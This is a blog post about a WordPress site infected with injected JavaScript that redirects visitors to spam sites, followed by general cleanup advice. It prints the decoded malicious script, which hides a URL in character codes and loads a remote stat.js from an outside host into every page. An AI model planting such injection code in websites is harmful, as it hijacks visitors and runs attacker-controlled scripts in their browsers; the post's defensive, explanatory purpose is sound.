Yesterday, I saw a webmaster asking in a group about a WordPress
built websitethat automatically redirects to someone else's website as soon as it opens. Then Naiba visited the URL he sent privately to take a look.
WordPress Infected with Malicious Redirect Code
When opening your own website, after most of the website content loads, it automatically redirects to a third-party website, and it may redirect through several websites consecutively. At the same time, the redirected website will ask you to grant it notification permissions, as shown in the figure below:
Then I analyzed the website's source code (many Plugins were installed, resulting in a lot of js and other code, making it very messy). Finally, I found that the following string of code seemed abnormal. I asked the webmaster, and it wasn't his own code nor from any of the Plugins he installed.
Then Naiba searched for this eval(String.fromCharCode and found the following recorded article.
Record - Website HACKED!
Then via
jdstiles.comthis website parsed the meaning of the above string of code.
var d=document;var s=d.createElement('script');
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}Parsing the above numbers again resulted in the following website.
https://blackawardago.com
Regardless of what URL finally appears, it's known that the website has been hacked. Abroad, this is called WordPress malicious redirect code, which seems to have become popular since 2018. Below are two articles Naiba saw while searching for information.
https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-netIf you want to know if your website is also infected with this malicious redirect code, you can check it via the following website.
https://sitecheck.sucuri.net/WordPress Malicious Redirect Code Removal Methods
Of course, if infected with WordPress malicious redirect code, how to remove it? (Because that website owner didn't ask me to help handle it, so Naiba didn't have access to the actual code. Below are the general handling methods shared.)
Solution for those who can understand code- Find the malicious code, delete it.
- Check all website files and code to see if there are any other infected or unknown scripts, delete them.
- Check if the database is infected, if yes, delete the infected content.
Solution for those who cannot understand code- Pay someone who understands code to clean it for you. I saw the foreign price above is $108/year.
- Delete the website and reinstall it, ensure using secure Themes and Plugins, ensure the database is not infected, ensure server security.
If any experts reading this article know how to clean this type of malicious code, or have experience cleaning malicious code, please leave a comment to advise.
Finally, recommend a Plugin:
Install a firewall for WordPress! Try WordfenceRelated knowledge:
Implement security measures to prevent WordPress websites from being hacked
Comments are closed
The comment function for this article is closed. If you have any questions, please feel free to contact us through other channels.